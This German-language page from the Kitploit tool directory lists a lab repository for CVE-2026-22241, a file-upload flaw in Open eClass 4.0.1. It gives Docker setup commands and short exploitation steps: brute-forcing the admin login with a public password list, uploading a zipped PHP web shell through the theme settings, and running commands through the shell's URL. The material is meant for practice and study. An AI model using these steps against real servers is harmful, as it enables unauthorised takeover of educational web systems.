Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22241 — Laborumgebung für CVE-2026-22241 | Kitploit
Tools/GitHubGitHub/cves-labs/cve-2026-22241
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

Laborumgebung für CVE-2026-22241

Repository anzeigen
47vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22241

Laborumgebung für CVE-2026-22241

Schwachstellenbeschreibung:

  • Schwachstelle: Uneingeschränkter Upload von Dateien mit gefährlichem Typ.
  • Auswirkung: Remote-Code-Ausführung (RCE).
  • Beschreibung: Dieser Fehler ermöglicht es einem Angreifer mit administrativen Rechten, eine schädliche PHP-Datei (Web-Shell) hochzuladen, was zu einer vollständigen Kompromittierung der Integrität und Sicherheit des Webservers führt.
  • Zielsystem: OpenClass Educational Infrastructure.

1. Umgebung aufbauen

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

open https://www.openeclass.org/en/previous-versions/ and download openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

Bild
Tool herunterladen

2. Schwachstelle ausnutzen:

für Schlüsselliste in ZAP (Brute-Force): https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

auf der eclass-Seite: gehe zu Admin-Tool -> Theme-Einstellungen -> dann poc.zip hochladen

auf neuer Seite:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id